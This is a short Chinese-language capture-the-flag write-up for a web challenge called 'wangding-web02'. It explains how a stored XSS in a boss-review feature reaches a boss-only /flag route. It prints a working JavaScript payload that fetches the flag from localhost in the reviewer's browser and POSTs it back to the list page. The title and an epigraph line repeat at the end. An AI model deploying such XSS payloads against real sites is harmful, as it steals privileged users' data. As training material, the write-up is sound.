wangding-web02

解题步骤（WriteUp）

输入任意用户名密码开一个新的list

同时发现/flag路由，只有boss能访问

有boss审核功能，猜测存在XSS

尝试发现机子不出网，直接向list页面post信息，获取flag

<script>
        var url = document.location.href;
        fetch("http://127.0.0.1:5000/flag").then(resp => resp.text()).then((flag) => {
            var xhr = new XMLHttpRequest();
            xhr.open("POST", url, true);
            xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
            xhr.send("content=" + flag);
        });
</script>

> Passions & dreams like sora, *zipped* up in my heart

wangding-web02

解题步骤（WriteUp）

> Passions & dreams like sora, zipped up in my heart